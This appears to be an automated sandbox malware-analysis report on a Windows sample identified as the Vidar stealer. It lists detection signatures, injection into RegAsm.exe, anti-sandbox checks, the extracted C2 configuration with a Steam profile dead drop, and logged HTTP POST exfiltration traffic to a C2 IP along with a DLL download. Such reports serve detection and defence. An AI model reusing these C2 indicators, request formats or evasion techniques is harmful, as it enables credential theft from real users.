Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1519653
MD5:4453d7bc66e29c48ed6495bfa820e5b5
SHA1:da622e588d635bbadd7ff04ad3df5db191ff0549
SHA256:941e7002f11290e3ed9dd99d8cc0abc62f6cf69b923ae30b89741579854a8a70
Tags:exeuser-Bitsight
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 928 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4453D7BC66E29C48ED6495BFA820E5B5)
    • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 4628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 5684 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 2188 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b26735cbe8ca9e75712ffe3aa40c4a60"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: file.exe PID: 928JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 6 entries
            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.33d5570.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.2.file.exe.33d5570.1.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                0.2.file.exe.33d5570.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.file.exe.33d5570.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    3.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-26T19:49:32.179378+020020287653Unknown Traffic192.168.2.4497405.75.211.162443TCP
                      2024-09-26T19:49:33.384870+020020287653Unknown Traffic192.168.2.4497415.75.211.162443TCP
                      2024-09-26T19:49:34.954154+020020287653Unknown Traffic192.168.2.4497425.75.211.162443TCP
                      2024-09-26T19:49:36.833518+020020287653Unknown Traffic192.168.2.4497435.75.211.162443TCP
                      2024-09-26T19:49:38.321713+020020287653Unknown Traffic192.168.2.4497445.75.211.162443TCP
                      2024-09-26T19:49:52.524007+020020287653Unknown Traffic192.168.2.4497525.75.211.162443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-26T19:49:37.670343+020020442471Malware Command and Control Activity Detected5.75.211.162443192.168.2.449743TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-26T19:49:39.047255+020020518311Malware Command and Control Activity Detected5.75.211.162443192.168.2.449744TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-26T19:49:39.047099+020020490871A Network Trojan was detected192.168.2.4497445.75.211.162443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: https://5.75.211.162/sqlp.dllgAvira URL Cloud: Label: malware
                      Source: https://5.75.211.162/sqlp.dllbAvira URL Cloud: Label: malware
                      Source: https://steamcommunity.com/profiles/76561199780418869/badgesAvira URL Cloud: Label: malware
                      Source: https://steamcommunity.com/profiles/76561199780418869/inventory/Avira URL Cloud: Label: malware
                      Source: https://steamcommunity.com/profiles/76561199780418869Avira URL Cloud: Label: malware
                      Source: https://5.75.211.162/%Avira URL Cloud: Label: malware
                      Source: https://5.75.211.162Avira URL Cloud: Label: malware
                      Source: https://t.me/ae5edAvira URL Cloud: Label: malware
                      Source: https://5.75.211.162/sqlp.dllAvira URL Cloud: Label: malware
                      Source: https://5.75.211.162/sqlp.dlls.exeAvira URL Cloud: Label: malware
                      Source: https://5.75.211.162/EAvira URL Cloud: Label: malware
                      Source: https://5.75.211.162/2Avira URL Cloud: Label: malware
                      Source: https://5.75.211.162/VAvira URL Cloud: Label: malware
                      Source: https://5.75.211.162/MAvira URL Cloud: Label: malware
                      Source: https://5.75.211.162/cAvira URL Cloud: Label: malware
                      Source: https://5.75.211.162/Avira URL Cloud: Label: malware
                      Source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b26735cbe8ca9e75712ffe3aa40c4a60"}
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: c:\rje\tg\jv2je3\obj\Release\ojc.pdb source: file.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,3_2_00415142
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_004014AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_004014AD

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49744 -> 5.75.211.162:443
                      Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.4:49744
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.4:49743
                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                      Source: Joe Sandbox ViewIP Address: 5.75.211.162 5.75.211.162
                      Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 5.75.211.162:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 5.75.211.162:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 5.75.211.162:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 5.75.211.162:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 5.75.211.162:443
                      Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 5.75.211.162:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406963 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,3_2_00406963
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                      Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                      Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                      Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                      Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: file.exeString found in binary or memory: http://ocsp.digicert.com0
                      Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
                      Source: file.exeString found in binary or memory: http://ocsp.entrust.net02
                      Source: file.exeString found in binary or memory: http://ocsp.entrust.net03
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                      Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
                      Source: file.exeString found in binary or memory: http://www.digicert.com/CPS0
                      Source: file.exeString found in binary or memory: http://www.entrust.net/rpa03
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://5.75.211.162
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000058A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162.exe
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/%
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/2
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/E
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/M
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/V
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/c
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/sqlp.dll
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/sqlp.dllb
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/sqlp.dllg
                      Source: RegAsm.exe, 00000003.00000002.2183942555.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162/sqlp.dlls.exe
                      Source: RegAsm.exe, 00000003.00000002.2183942555.0000000000582000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://5.75.211.162BKFCB
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                      Source: RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                      Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
